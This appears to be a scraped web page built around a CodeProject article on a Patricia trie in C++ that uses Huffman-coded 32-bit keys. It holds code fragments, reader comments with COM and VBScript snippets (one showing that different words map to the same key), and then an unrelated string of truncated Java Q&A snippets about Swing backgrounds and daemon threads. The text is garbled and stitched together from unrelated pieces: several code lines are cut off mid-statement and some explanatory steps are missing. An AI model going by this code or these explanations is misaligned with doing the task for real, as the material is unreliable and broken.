The Huffman code used in my PAT trie is an array of twenty-six numbers. The first cell holds the Huffman code for the letter 'a', the next cell for 'b', and so on. The code stored in each cell is the reduced bit representation of the corresponding letter. For instance, the fifth cell is for 'e' and holds the number zero. 'e' is the most frequent letter in the English alphabet and so should map to the smallest number. To build our key:
To better explain the last three steps, here is an example:
How was the decision made that the letter 'e' is the most frequent and 'z' is the twenty-third most frequent? Initially, I wrote a program to mill through text and produce a list of the most frequent letters in the English alphabet. Fortunately, it was brought to my attention (by Don Clugston - on Code Project) that there is an official list of the most frequent letters. I should have thought of that... Irregardless, the code has been updated and kudos/thanks to Don! The change will improve the speed of the code. Note that if you use this class to store command lists or some type of structured document where the same words are being used over and over, it pays to rearrange the frequency to match the most frequently used letters. If you were storing C programming code, then if and while would crop up quite a bit. The most frequent letter should (possibly) be i.
if
while
What if you Huff duplicates? My PAT trie is set up so that you associate an entire class with a key. It will only store a key once, but the class associated with it could remember information about duplicates. For instance, here are three scenarios:
There are three classes that together create my Patricia Trie:
PatriciaTrieC
PatriciaNodeC
ASSOCIATED_CLASS (PayloadC)
PayloadC
ASSOCIATED_CLASS
The Huffman code array is a static member of the PatriciaTrieC class. It is initialized once for the class and available for all objects of PatriciaTrieC. If you want to change the values, you will have to go in and tweak the array itself.
static
//STATIC HUFFMAN CODE - ONLY CREATED ONCE
//*****************************************************************
//build huffman tree
//based on common letter usage in the English language
//source: UNIX manual pages (find, ls, mv, cp, ...) all added together
//
//e t a o i n s r h l d c u m f p g w y b v k x j q z
//
char PatriciaTrieC::huffman_code [] =
{
/* A-D */
2, //A
18, //B
11, //C
10, //D
/* E-H */
0, //E
The code that Huffs text to keys will ignore all characters that are not A through Z (case-insensitive). So, the strings "HAPPY" and "H A P P Y" would Huff to the same key. Also note that the character strings should be terminated by the end of string character ('\0' or zero).
//convert text to integer
do
{
//if we get to the end of the text string
//before the key is filled that is okay
//we will just use what we have!
if (txt [txt_count] == END_OF_STRING)
break;
//if big caps, then make it small
if (txt [txt_count] >= 'a' && txt [txt_count] <= 'z')
txt [txt_count] -= LOWER_TO_UPPER_FACTOR;
//skip all weird characters (only normal letters are handled)
if (txt [txt_count] < 'A' || txt [txt_count] > 'Z')
{
//go to next character
txt_count += 1;
//try next character
continue;
}
.
.
.
You can insert, search, and remove a key (or one data element) out of the trie. There is a method BuildKey that you can use to convert text into keys if you wanted to store or find out the exact key signature for a string of text. You can also call Print to print the entire trie (if DEBUG is set) or Clear to wipe the entire trie.
BuildKey
Print
DEBUG
Clear
The class associated with every leaf node (where data is stored) is PayloadC. If you want your own class, just change the constant ASSOCIATED_CLASS in the pat.h file to the name of your class.
The included project has a nice little program that loads words from a text file and inserts, searches and then removes them all. Below is a simple example of those three operations (insert, search, remove):
#include "pat.h"
#include <iostream.h>
int main ()
{
//CREATE VARIABLES
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//create two associated classes
PayloadC* p_dyn = new PayloadC ();
PayloadC p_stc;
//for getting returns on associated class from remove and search
PayloadC* catch_payload = NULL;
//the PAT trie
PatriciaTrieC pat;
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//insert HAPPY and search for it
//////////////////////////////////////////////////
if (pat.Insert (p_dyn, "HAPPY"))
cout << "inserted HAPPY" << endl;
else
cout << "did not insert HAPPY" << endl;
catch_payload = pat.Search ("HAPPY");
//insert SAD and search for it
//////////////////////////////////////////////////
if (pat.Insert (&p_stc, "SAD"))
cout << "inserted SAD" << endl;
else
cout << "did not insert SAD" << endl;
catch_payload = pat.Search ("SAD");
//////////////////////////////////////////////////
catch_payload = pat.Search ("WHO");
if (!catch_payload)
cout << "WHO does not exist" << endl;
//REMOVE EVERYTHING, WHO WILL NOT BE REMOVED
//////////////////////////////////////////////////
catch_payload = pat.Remove ("HAPPY");
catch_payload = pat.Remove ("SAD");
catch_payload = pat.Remove ("WHO");
return 0;
}
The word frequency list I used came from here.
Insert
Search
The PAT trie with a 32 bit key can store (2^32-1) / 2 = 2,147,483,647 words and find any of them in 32 bit comparisons.
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
class PayloadC
{
private:
public:
char foo[128];
PayloadC () {}
~PayloadC () {}
};
STDMETHODIMP Patricia::Search(BSTR sData, VARIANT_BOOL *bResult)
{
USES_CONVERSION;
LPSTR saData = W2A( sData );
PayloadC* p;
*bResult = ( ( p = pat.Search(saData) ) != NULL ) ? VARIANT_TRUE : VARIANT_FALSE;
// cout << p->foo;
return S_OK;
}
For i = 0 To UBound(a) - 1
tag = a(i)
Debug.Print "'" & tag & "'"
If Not b.Insert(tag) Then
fc = fc + 1
Else
If b.Search(tag) Then
xc = xc + 1
End If
sc = sc + 1
End);
shift_bits =);
ISNER ( 100 1110 1111 0 11110 ) 80862
LONER ( 1001 110 1111 0 11110 ) 80862
ANDRLE ( 10 1010 11110 11000 101101 0 ) 5631066
ANDRY ( 10 1010 11110 11000 1011010 ) 5631066
ISNER ( 100 111 101 0 110 ) 5078
LONER ( 1001 11 101 0 110 ) 5078
ANDRLE ( 10 101 1010 110 1001 0 ) 88786
ANDRY ( 10 101 1010 110 10010 ) 88786
option explicit
dim sHuff
dim aHuff
sHuff = "2,19,11,10,0,14,16,8,4,23,21,9,13,5,3,15,24,6,7,1,12,20,17,22,18,25"
aHuff = split(sHuff,",")
translate "ISNER"
translate "LONER"
translate "ANDRLE"
translate "ANDRY"
sub translate( sFrom )
dim i
dim c
dim n
dim huff
dim t
t = ""
for i = 1 to len( sFrom )
c = mid( sFrom, i, 1 )
n = asc(c) - asc("A")
huff = aHuff(n) * i
'wscript.echo c,n,aHuff(n),i,huff,hex(huff)
t = t & getbinary(huff) & " "
wscript.echo sFrom, "( "&t&")", getinteger(t)
end sub
'binary functions adapted from
Function GetInteger(sBinary)
' Returns the integer that corresponds to a binary string of length 8
Dim iRet
dim i
dim s
' Remove any spaces
s = Replace(sBinary, " ", "")
iRet = 0
For i = 0 To Len(s) - 1
iRet = iRet + 2 ^ i * CInt(Mid(s, Len(s) - i, 1))
GetInteger = iRet
End Function
Function GetBinary(iInput)
' Returns the 8-bit binary representation
' of an integer iInput where 0 <= iInput <= 255
Dim s
dim i
If iInput < 0 Or iInput > 255 Then
GetBinary = ""
Exit Function
End If
s = ""
while iInput > 0
s = CStr(iInput Mod 2) & s
iInput = iInput \ 2
wend
if s = "" then s = "0"
GetBinary = s
End Function
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/8762/Patricia-and-Huffman-Sitting-in-a-Trie?fid=125303&df=90&mpp=25&noise=3&prof=True&sort=Position&view=None&spc=None&select=2110152&fr=1 | CC-MAIN-2014-52 | refinedweb | 2,250 | 67.18 |
Objective-J and Cappuccino Released 56
Wizard Drongo writes "280 North, who earlier this year released 280 Slides, a revolutionary new type of web-app written in Objective-J using the Cappuccino framework (both of which they also wrote), have today made good on their promise to open-source the language and framework. From their about page: 'Cappuccino is an open source application framework for developing applications that look and feel like the desktop software users are familiar with. Cappuccino was implemented using a new programming language called Objective-J, which is modeled after Objective-C and built entirely on top of JavaScript. Programs written in Objective-J are interpreted in the client, so no compilation or plugins are required. Objective-J is released alongside Cappuccino in this project and under the LGPL.' You can download the framework, tools, documentation and more on their website."
Hmmm.... (Score:4, Funny)
...and JJ (Score:1)
Dy-no-mite!
Re: (Score:3)
Confusing (and unappealing) names seem to be part of the software landscape. The important part of the announcement is that they open sourced the language and framework. Free software gains another set of tools. This is a Good Thing. Props to 280 North.
Re: (Score:1)
Re: (Score:2)
Somewhere on my list of "things to do when I get a time machine":
Find the Netscape and Sun marketroids who coined the name "JavaScript" and kick them all in the gender-appropriate gonads before they do it.
Re: (Score:2)
Re:Hmmm.... (Score:4, Informative)
Re: (Score:3, Funny)
Re: (Score:3, Informative)
I have never used J and know nothing about J
Rest assured that those who have and do mostly run away screaming...
*looks askance at those who like J*
Those who do *NOT* run away screaming are probably likely to prefer developing Java in notepad, think perl is a good application framework and partake in usenet arguments about usable GIMP is.
What? Me bitter?
Leave GIMP out of this. (Score:2)
But everything else you mentioned holds true. Or at least it seems as if it could.
Re: (Score:2)
GIMP is usable now
As a discriminating individual perhaps I can interest you the first part of our fascinating lecture series on the J language?
Re: (Score:2)
Re: (Score:2)
{{y@&x'y}[{&/x-l*_x%l:2_!x}]3_!x}50
3 5 7 11 13 17 19 23 29 31 37 41 43 47
that's primes < 50 (fairly naively, i'll admit)
Re:Hmmm.... (Score:5, Insightful)
Would you have preferred Visual Objective-J++.Net 3.0b MSDN Edition?
The name is not bad. The main thing it does to me is imply Objective-C heritage which is what it is supposed to do. The J could be confused with Java though. Objective-JS would have cleared that up, but then it doesn't sound nearly as close to Objective-C.
This is all the fault of that decision long ago to name JavaScript after Java for marketing reasons.
I'd suggest Objective-ECMA, but that sounds like the test for a skin rash.
PS: What's with the "nod" tags today?
Objectivism (Score:5, Funny)
Maybe they could call it Objectivism.
Or Atlas.
*shrug*
Re: (Score:2)
So it would be: Visual Objective J# 2008 Team Edition for Rich Internet Application Developer, Service Pack 1.
Re: (Score:1)
And for their next trick: (Score:4, Funny)
Re: (Score:3, Interesting)
If it's as cool as their online presentation application, I'll actually be a tiny bit excited. The newest browsers actually run 280slides.com [280slides.com] pretty well. Safari is acceptable and Chrome actually screams.
For the love of God, please don't run it in IE.
Re:And for their next trick: (Score:5, Informative)
I just tried that, and it's hellishly slow in IE6, but runs like shit off a shovel in Firefox 3.
I haven't tried Chrome yet, but I'm guessing the shovel in that case will be chrome as well.
One thing that did piss me off was the "Download and Present" slide, which reminded me that Powerpoint 2007 format is "an ISO standard". While true, such statements are prone to making me quite irate
:P
Re: (Score:2)
What?
280Slides runs noticeably better for me in FF 3.0.1 than in Chrome. Thats with 2 tabs open in FF and 0 in Chrome.
Re: (Score:1)
Re: (Score:2)
You're right - it does look ripped right from Apple. But I opened up Keynote and 280Slides side-by-side, and it is clear they've only copied the "look and feel", but they haven't copied any of the icons.
I don't think they have any intention of making applications look "native". The applications will look exactly the same one every browser on every OS - at least in theory. Since they modeled it on OpenStep, it ends up looking very NeXT/Apple Cocoa.
Re: (Score:2)
they'll make yet another online spreadsheet application! I can hardly contain myself!
Nay sayer! Besides, spreadsheets are so passe. They will be actually bring back Lotus Improv, a program that was ahead of its time.
Re: (Score:2)
they'll make yet another online spreadsheet application! I can hardly contain myself!
Nay sayer! Besides, spreadsheets are so passe. They will be actually bring back Lotus Improv, a program that was ahead of its time.
If only Numbers could duplicate what Improv on NeXTSTEP then it would be something truly to threaten Microsoft.
Re: (Score:3, Insightful)
Years and years ago, when I was working for a mainframe timeshare outfit and was teaching myself to program, one of the technicians said to me "Why do you want to do that? All the software anybody needs has already been written."
You remind me a little of that guy.
Re: (Score:3, Funny)
Re: (Score:2)
I don't think that Lotus Symphony was... it was WAY different than 1-2-3, Excel, QuattroPlus, et al...
Re: (Score:2)
Doh! It was Lotus Improv that was way ahead of its time...
Re: (Score:2)
I don't think that Lotus Symphony was... it was WAY different than 1-2-3, Excel, QuattroPlus, et al...
It's Quattro Pro and it was far superior to Excel, especially for us traditional Engineering majors [ME/EE/ChemE, et.al].
Re: (Score:2)
Re: (Score:2)
What about VisiCalc. You're not saying it was really written by John Titor in a previous trip are you?
Re: (Score:3, Interesting)
This framework and language offers nothing new nor a compelling reason to use them. So your comparison is bad and your point is an attempt to look clever while failing to understand the wasted time and effort. I worked for years as a sysadmin, in a company with much more (experience and talent than these guys) while attempting to do what this framework is still trying to do. It takes about 1/10th the time and effort to create a BETTER flash app to anything that can be developed with these heavy JS framework
Re: (Score:1)
Re: (Score:2)
Apparently it takes quite a bit of time and effort to create a flash app that doesn't crash on Linux, since I haven't seen one yet...
Re: (Score:2)
No joking. Could this "280slides" site be more of a ripoff of Powerpoint? I doubt it.
Oh, and the default font is Comic Sans. That alone makes it worthy of derision.
Breakfast (Score:2, Funny)
Re: (Score:2)
Re: (Score:2)
My guess is guys stuck in marketing meetings and waiting for lunch.
The Library is the Story (Score:5, Interesting)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
You know what, I'm wrong about that I think. I'm just going to shut up and keep reading.
Now where's the fun in that?
Re: (Score:2)
Keeping the NS in place allows programs from NeXTSTEP to be recompiled on OS X without modification. Win.
Besides, what do we change it to? 'X' implies the X Window System. 'OSX'? How about what happens when Mac OS 11.0 comes out?
If it ain't broke...
Re: (Score:2)
OS X + 1 = OS XI
I can't wait for it to rival Rocky or the Super Bowl.
Re: (Score:2)
It kind of is "broke". The only reason to have initials prefixing class names is because Objective-C doesn't support namespaces - or at least it didn't the last time I fooled around with it.
Re: (Score:2)
Re:The Library is the Story (Score:4, Interesting)
Just what we need... (Score:1)
Oh and coffee too.
Re: (Score:1)
Ah, well, in that case, maybe someone should be working on implementing a Perl interpreter in Objective-J...
Is it just me... (Score:1)
...or would a right-click context menu not complete 280's otherwise very useful Slides program? | https://developers.slashdot.org/story/08/09/05/1443248/objective-j-and-cappuccino-released?sdsrc=next | CC-MAIN-2017-13 | refinedweb | 1,502 | 74.19 |
nghttp2_submit_response¶
Synopsis¶
#include <nghttp2/nghttp2.h>
- int
nghttp2_submit_response(nghttp2_session *session, int32_t stream_id, const nghttp2_nv *nva, size_t nvlen, const nghttp2_data_provider *data_prd)¶
Submits response HEADERS frame and optionally one or more DATA frames against the stream stream_id.
The nva is an array of name/value pair
nghttp2_nvwith nvlen elements. The application is responsible to include required pseudo-header fields (header field whose name starts with ":") in nva and must place pseudo-headers before regular header fields.
This function creates copies of all name/value pairs in nva. It also lower-cases all names in nva. The order of elements in nva is preserved. For header fields with
nghttp2_nv_flag.NGHTTP2_NV_FLAG_NO_COPY_NAMEand
nghttp2_nv_flag.NGHTTP2_NV_FLAG_NO_COPY_VALUEare set, header field name and value are not copied respectively. With
nghttp2_nv_flag.NGHTTP2_NV_FLAG_NO_COPY_NAME, application is responsible to pass header field name in lowercase. The application should maintain the references to them until
nghttp2_on_frame_send_callbackor
nghttp2_on_frame_not_send_callbackis called.
HTTP/2 specification has requirement about header fields in the response HEADERS. See the specification for more details.
If data_prd is not
NULL, it provides data which will be sent in subsequent DATA frames. This function does not take ownership of the data_prd. The function copies the members of the data_prd. If data_prd is
NULL, HEADERS will have END_STREAM flag set.
This method can be used as normal HTTP response and push response. When pushing a resource using this function, the session must be configured using
nghttp2_session_server_new()or its variants and the target stream denoted by the stream_id must be reserved using
nghttp2_submit_push_promise().
To send non-final response headers (e.g., HTTP status 101), don't use this function because this function half-closes the outbound stream. Instead, use
nghttp2_submit_headers()for this purpose.
This function returns 0 if it succeeds, or one of the following negative error codes:
nghttp2_error.NGHTTP2_ERR_NOMEM
Out of memory.
nghttp2_error.NGHTTP2_ERR_INVALID_ARGUMENT
The stream_id is 0.
nghttp2_error.NGHTTP2_ERR_DATA_EXIST
DATA or HEADERS has been already submitted and not fully processed yet. Normally, this does not happen, but when application wrongly calls
nghttp2_submit_response()twice, this may happen.
nghttp2_error.NGHTTP2_ERR_PROTO
The session is client session.
Warning
Calling this function twice for the same stream ID may lead to program crash. It is generally considered to a programming error to commit response twice. | https://nghttp2.org/documentation/nghttp2_submit_response.html | CC-MAIN-2021-25 | refinedweb | 366 | 51.44 |
Introduction: Internet of Dirt: a Texting Plant
Do you struggle to keep your plants alive? Looking to get started with an IoT project? Why not have your plants text you when they need watering?
This simple project combines a capacitive soil sensor, the WiFi-enabled Adafruit Feather HUZZAH ESP8266 board, Adafruit IO, and IFTTT to set up a system that will text you when your plant's soil gets too dry. It makes a great intermediate-level Arduino project, or a good introduction to Internet of Things-style projects.
Materials list
- Adafruit Feather HUZZAH ESP8266
- USB cable
- Breadboard
- Male-to-male jumper wires
- 330Ohm resistors
- DF Robot corrosion-resistant soil sensor
- A plant
- A cup of water
Skills required
- Soldering
- Breadboarding
- Basic Arduino programming
This first appeared as a class co-taught by Bonnie Eisenman and Maya Kutz at NYC Resistor. For future iterations of the class, keep an eye on our Eventbrite listings.
Step 1: Install Arduino IDE, USB Drivers, and ESP8266 Board Package
There's a bunch of software you'll want to install for this to work. Let's get started!
Install the Arduino IDE.
Install the required USB drivers.
Install the ESP8266 board package for Arduino. You can do this by opening the Arduino IDE's preferences menu (in version 1.6.4 or above - update the IDE if necessary), then adding the URL:
into the field Additional Board Manager URLs. (See photo above.)
Then go to Tools -> Board -> Board Manager, and search for "esp8266". Install the ESP8266 package.
Restart the Arduino IDE.
Step 2: Install the MQTT Library
In the Arduino IDE, go to Sketch -> Include Library -> Manage Libraries.
Restart the Arduino IDE.
Step 3: Test Your Feather With the Blink Program
OK, now that we've installed a bunch of software, let's ensure that your Feather is working properly.
The Adafruit Feather HUZZAH is an Arduino-compatible microcontroller with a built-in WiFi chip. It's therefore pretty useful for WiFi-enabled electronics projects.
Plug your Feather into your computer, and run the following program. The onboard LED should blink. Try changing the timing of the blinking, too, to ensure that your program is being run correctly.
void setup() { pinMode(0, OUTPUT); } void loop() { Serial.println("Hey! I'm in a loop!"); digitalWrite(0, HIGH); delay(500); digitalWrite(0, LOW); delay(500); }
Why does this work? On the Feather HUZZAH, there's an LED connected to pin 0. By writing HIGH and then LOW signals to that pin, we also cause the LED to blink.
Step 4: Solder Up Your Feather
Time to solder up your Feather so we can use it with the soil sensor. You have two options here.
Option 1 (for intermediate students):
Solder the included headers to your Feather. This way it'll be easier to use your Feather in future projects.
Option 2 (for beginners):
- Solder a black wire to GND
- Solder a red wire to 3V
- Solder a blue wire to ADC
Step 5: Take a Look at Your Soil Sensor
Before we wire everything up, let's take a look at the soil sensor.
Your soil sensor has three pins: one for power, one for ground, and one for signal.
The electronics on top of your sensor are not waterproof! Be careful not to short your sensor while testing it. The line at the top marks where you can submerge it.
Step 6: Wire Up Your Soil Sensor
Wire up your soil sensor according to the Fritzing diagram above.
For beginners, here's the text version:
- Connect the black wire on your Feather to the ground rail of your breadboard
- Connect the GND pin of your soil sensor the ground rail of your breadboard
- Connect the red wire on your Feather to the power rail of your breadboard
- Connect the VCC pin of your soil sensor to the power rail of your breadboard
- Connect the blue wire on your Feather to row 5 of your breadboard
- Place a resistor between row 5 of your breadboard and the ground rail
- Place a resistor between rows 5 and 10 of your breadboard
- Connect the SIG pin of your soil sensor to row 10 of your breadboard
Step 7: Test Your Soil Sensor
Upload the following code using the Arduino IDE:
int inputPin = A0; /* The default dry and wet values for the sensor are 520 and 260 (no voltage divider). * To calibrate your sensor, run this code and open the Serial Monitor. * Record the value being measured as your new "dry" value. * Insert the sensor to the white line in a cup of water. Record the new reading as the "wet" value. */ const int dryVal = 567; const int wetVal = 367; int sensorVal = 0; //initialize value for sensor readings void setup() { Serial.begin(115200); } void loop() { sensorVal = analogRead(inputPin); Serial.print("Sensor Value: "); Serial.println(sensorVal); Serial.print("Relative humidity: "); // calculate RH assuming linear relationship between sensor readings and soil moisture level. Serial.print(100* (dryVal - sensorVal) / (dryVal - wetVal)); Serial.println("%"); Serial.println(); delay(1000); }
Record the sensor value while your sensor is dry. Then, insert the sensor into a cup of water, and record the value when the sensor is wet. Replace the default values for dryVal and wetVal in the code accordingly, and then re-upload the Arduino sketch.
Step 8: Grab a Plant and Find Your Humidity Threshold
Now, grab a plant. It should be in need of watering. Insert the soil sensor into the soil.
Measure the sensor reading of the plant when it needs watering; then, water your plant. Measure the sensor value post-watering.
Because different plants have different needs, there's no universal humidity value we can use to alert on. You might want to take measurements over a series of days to determine which humidity values indicate that your plant needs watering.
Make a note of where you want to set the alert threshold for your plant - we'll need it later.
Step 9: Make an Account on Adafruit IO and Note Your Credentials
We'll be using Adafruit.io to record our plant's humidity data. Make an account on.
You'll then need to find the following information:
- your adafruit.io username: you can find this from the URL, which should look like
- your adafruit.io key: from your dashboard, click on the key icon
Step 10: Connect to Adafruit IO
Now we need to modify our code to send data to Adafruit.
This is largely taken from Adafruit's tutorial. It's almost entirely boilerplate, but what this code does is:
- connect to your WiFi network
- connect to Adafruit via WiFi
- read data from your soil sensor
- upload sensor data to Adafruit
You will need to change the following variables in the code:
- WLAN_SSID - this is the name of your WiFi network
- WLAN_PASS - this is the password to your WiFi network
- AIO_USERNAME - this is your adafruit.io username
- AIO_KEY - this is your adafruit.io key
- dryVal - from your previous code
- wetVal - from your previous code
// Libraries
#include #include "Adafruit_MQTT.h" #include "Adafruit_MQTT_Client.h"
// WiFi parameters #define WLAN_SSID "YOUR WIFI HERE" #define WLAN_PASS "YOUR WIFI PASSWORD"
// Adafruit IO #define AIO_SERVER "io.adafruit.com" #define AIO_SERVERPORT 1883 #define AIO_USERNAME "YOUR USERNAME" #define AIO_KEY "YOUR KEY"
int inputPin = A0;
// CHANGE THESE BASED ON YOUR SENSOR READINGS const int dryVal = 567; const int wetVal = 367;
// Functions void connect(); int readHumidity();
WiFiClient client; Adafruit_MQTT_Client mqtt(&client, AIO_SERVER, AIO_SERVERPORT, AIO_USERNAME, AIO_KEY);
/****************************** Feeds ***************************************
/ Setup feeds for temperature & humidity Adafruit_MQTT_Publish humidity = Adafruit_MQTT_Publish(&mqtt, AIO_USERNAME "/feeds/humidity");
/*************************** Sketch Code ************************************/
void setup() { Serial.begin(115200); Serial.println(F("Adafruit IO Example"));
// Connect to WiFi access point. Serial.println(); Serial.println(); delay(10); Serial.print(F("Connecting to ")); Serial.println(WLAN_SSID);
WiFi.begin(WLAN_SSID, WLAN_PASS); while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print(F(".")); } Serial.println();
Serial.println(F("WiFi connected")); Serial.println(F("IP address: ")); Serial.println(WiFi.localIP());
// connect to adafruit io connect(); }
void loop() { // ping adafruit io a few times to make sure we remain connected if(! mqtt.ping(3)) { // reconnect to adafruit io if(! mqtt.connected()) connect(); }
// Grab the current state of the sensor int humidity_data = readHumidity();
// Publish data if (!humidity.publish(humidity_data)) { Serial.println(F("Failed to publish humidity")); } else { Serial.print(F("Humidity published: ")); Serial.println(humidity_data); }
// Repeat every minute delay(60000);
}
int readHumidity() { int sensorVal = analogRead(inputPin); return (int)(100*(dryVal-sensorVal)/(dryVal-wetVal)); }
//!"));
}
Step 11: Check That the Data Upload Is Working
After you run the sketch from the previous step, if you check your humidity feed from the adafruit.io interface, you should see data appear!
By default, the code from the previous step uploads new data every five seconds, which is probably overkill. Feel free to adjust this to something more sensible once you've confirmed that your code is working.
Step 12: Connect Adafruit IO to IFTTT
IFTTT (If This, Then That) is a wonderful, free service that lets you connect things together. And Adafruit.io has IFTTT integration! We're going to create an IFTTT applet: if our humidity feed on Adafruit.io is <5, then send a text message.
If you don't already have an IFTTT account, create one:
Then, create a new "applet." Click on the "this", search for Adafruit, and then select "Monitor a feed on Adafruit IO".
For the "that" portion, you can either set up notifications via the IFTTT application, or text messages, or email, or...you get the idea. Give it a try!
Step 13: Keep Your Plant Alive
Now you should receive push notifications when your plant is in need of watering.
This is just a prototype, of course. If you want to set up a robust system that will run with minimal intervention for months or years at a time, you'll want to think about power supplies, transferring your circuit from a breadboard to something more permanent, waterproof enclosures, etc. But this should get you started.
Good luck keeping your plants alive!
Recommendations
We have a be nice policy.
Please be positive and constructive.
11 Comments
which arduino version are you using for uploading the file, because i get an error at the begining, then I remove the "#include" and i get the second error
Great project, Bonnie! I bet the class it loads of fun, would love to TA next time. =]
Awesome project! Will the same code work on an Adafruit Feather M0 WiFi - ATSAMD21 + ATWINC1500?
I am not the author, I only answered a question, ask the author
sir what is the main purpose of this?
to get a text message informing you abt the humidity of the soil of yr plant
ahhh ,.sir? can i used this for my proposal ?i am 3rd year student taking up BS-ELECTRONICS if its ok to you?:)
The license on this Instructable is here:
It is not mine to say, I did not write the instructable.
you have to ask the author
Well done. just a tio.. after installing a library through library manager, I understand it is not necessary to restart the IDE
Very cool feature for plants! | http://www.instructables.com/id/Internet-of-Dirt-a-Texting-Plant/ | CC-MAIN-2018-26 | refinedweb | 1,841 | 65.32 |
Java Programming Tips, Articles and Notes
Java Programming Language simple tips to use Java effectively
This section is not very structured and discussing the random topics of the
Java Programming Language and which is useful in learning the Java Language.
Java Programming
Interview Tips - Java Interview Questions
Interview Tips Hi,
I am looking for a job in java/j2ee.plz give me interview tips. i mean topics which i should be strong and how to prepare. Looking for a job 3.5yrs experience
GRADIENT BACKGROUND
GRADIENT BACKGROUND How to set gradient colors a s background for a jframe? pls help me..............
Javascript background color - Java Beginners
Javascript background color Hi
How to compare background color...; Hi Friend,
If you want to change the background color of the textbox, try the following code:
Change background Color
function check
adding background image - Java Beginners
adding background image how do i add background image to this code... = new JTextField ("");
int average;
JPanel background = new JPanel...);
background.add(text11);
getContentPane().add(background
Jbutton[] background & foregroundcolor change
Jbutton[] background & foregroundcolor change how to change the color of the selected JButton in java swing.
I am create JButton in an array... foreground and background color is changed. the remaining jbutton foreground... color) to set the background color of that chunk. Here
we pass
How to set the Gradient Color as a background color for Java Frame?
How to set the Gradient Color as a background color for Java Frame? How to set the Gradient Color as a background color for Java Frame
how to create menubar and the below background color/image in java swing
how to create menubar and the below background color/image in java swing how to create menubar and the below background color/image in java swing
How to set background of an excel sheet using POI - Java Magazine
How to set background of an excel sheet using POI Hi,
i am trying to format the excel using java. How to set the background color of an excel...,
koushil Nath. Hi friend,
To set the background color of excel
Tips & Tricks
Tips & Tricks
Here are some basic implementations of java language, which you would... screen button on the keyboard, same way we can do it through java programming
How I can Set Transparent Background Image to Panel - Java Beginners
How I can Set Transparent Background Image to Panel Sir ,How I can Set Transperent Background Image to Jpanel.
plz Help
Tips & Tricks
Tips & Tricks
Splash
Screen in Java 6.0
Splash screens... of the application. AWT/Swing can be used to create splash screens in Java. Prior to Java SE
Change Background Picture of Slide Using Java
Change Background Picture of Slide Using Java
...;
In this example we are going to create a slide then change background picture of the
slide... to set this picture as background. To set picture as background of slide
we
How to Set Transperent Background Image to Jpanel - Java Beginners
How to Set Transperent Background Image to Jpanel Sir ,How to set Background Image to Jpanel. Hi Friend,
Try the following code:
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
public
how to color the Eclipse editor background programmatically?
how to color the Eclipse editor background programmatically? I have to color specific portion(background) of the of the Eclipse editor by running the java programm and provided that do the coloring from a given line number
Change Background of Master Slide Using Java
Change Background of Master Slide Using Java
... to create a slide then change background of the
master slide.
In this example we... constructor. Then we are creating fill for setting
background and for adding
Tips and Tricks
Tips and Tricks
Send
data from database in PDF file as servlet response... is a java library containing classes to generate documents in PDF, XML, HTML, and RTF
Add color to background but I can't labels or textfields
Add color to background but I can't labels or textfields Please help... JTextField(10);
con.add(l1);
con.add(tf1);
I am very new to Java, I...);
//tf1.setVisible(true)
}");
It has white background now instead of Maroon
Tips 'n' Tricks
Tips 'n' Tricks
Download files data from many
URLs
This Java program... arguments separated by space. Java provides
URLConnection class that represents
Change Background color using Custom Tag
Change Background color using Custom Tag
In this program, We will create a Custom Tag which changes the background
color.
JSP Custom Tags :
Provide... in a JSP application.
Provide simplicity and reusability of Java
java
: what is meant by constructor?
A java constructor
Dojo Tool tips
Dojo Tool tips
In this section, you will learn about the tool tips and how to developed it
in dojo.
Tool tips : This is a GUI
java
java what is ment by daemon
Java Daemon Threads
Daemon threads are like a service providers for other threads or objects running in the same process as the daemon thread. Daemon threads are used for background
java
java What is a daemon thread? Daemon threads are used for background supporting tasks and are only needed while normal threads... ground doing the garbage collection operation for the java run time system
Linux tutorials and tips
Linux is of the most advanced operating system. Linux is being used to host websites and web applications. Linux also provide support for Java and other programming language. Programmers from all the over the world is developing many
java - Java Beginners
the following links:
JAVA
JAVA sir" HOW TO DISPLAY TEXT FIELD IN A BACKGROUND IMAGE AT THE RUN TIME EITHER USING SWING OR APPLET IN JAVA BUT NOT AS JAVA SCRIPT"
Thanks
sowmiya.R
Here is a java swing code that displays background image
Java
" border="1" style="background-color: #ffffcc" align="center">
<TR>...="javascript:window.location='editData.jsp';" style="background-color:#49743D...:window.location='deleteData.jsp';"style="background-color:#ff0000;font-weight:bold
java
");
%>
<TABLE cellpadding="15" border="1" style="background-color: #ffffcc... language="java" import="java.util.*"%>
<%
int id = (Integer...;%@page language="java" import="java.util.*" %>
<form method="post" action
java
/TR/html4/loose.dtd">
<%@ page language="java" import="java.sql.*"%>
<title>...="background-color:#EDF6EA;border:1px solid #000000;">
<tr><td...;<input type="submit" name="Submit" value="Save" style="background-color
java - Java Interview Questions
Friend,
Please visit the following links:
java - Java Beginners
java HOW AND WHERE SHOULD I USE A CONSTRUCTOR IN JAVA PROGRAMMING...://
Thanks
java core collection - Java Interview Questions
java core collection why program in collection package throw two warnings(notes
java - Java Beginners
the following links:... output. Therefore in Java suggest how to accept input from the user and display
FullTrim in java - Java Beginners
FullTrim in java Hi ,
I want to know whether triming an array(fulltrim in ibm Lotus notes)is possible in java.
Ex: if array a[5] has only 3 values and the rest of the elements are null,then the full trim function should
Java code - Java Beginners
Java code how to make a program in java(Jbutton) if there is a combination numbers inorder to exit the program else the background color of the frame will turns red
java - Java Beginners
java write a programme to implement linked list using list interface Hi Friend,
Please visit the following link to learn about the implementation of LinkedList .
java - Java Beginners
Search:
b)Binary Search:
Along
Swing In Java
Swing In Java
In this tutorial we will read about the various aspects of Swing... Java Foundation Classes. JFC
covers the group of features that allows... for Java applications. In
early days Netscape Communications Corporation
java - Java Beginners
links:
Thanks
What is Java - Java Beginners
